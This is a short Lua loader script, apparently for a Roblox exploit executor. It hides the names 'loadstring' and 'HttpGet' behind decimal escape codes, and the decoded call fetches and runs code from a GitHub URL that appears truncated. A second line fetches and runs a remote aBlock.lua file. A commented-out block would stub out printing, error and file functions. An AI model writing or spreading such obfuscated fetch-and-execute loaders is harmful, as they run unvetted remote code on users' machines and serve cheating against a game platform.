--[[
local patch=function(...)
    local info=debug.getinfo(2)
    if info and info.what=='Lua'and info.func==print then return end
end
print=patch
error=patch
warn=patch
writefile=patch
readfile=patch
loadfile=patch
--]]
getfenv()["\115\112\97\119\110"](function()getfenv()["\108\111\97\100\115\116\114\105\110\103"](getfenv()["\103\97\109\101"]["\72\116\116\112\71\101\116"]("\104\116\116\112\115\58\47\47\103\105\116\104\117\98\46\99\111\109\47\70\117\114\114\121\66\111\121\89\84\47\115\121\110\122\95\102\105\120\101\100\95\100\101\120\47\114\97\119\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\116\97"))()end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/Intosable/aBlock/main/aBlock.lua"))()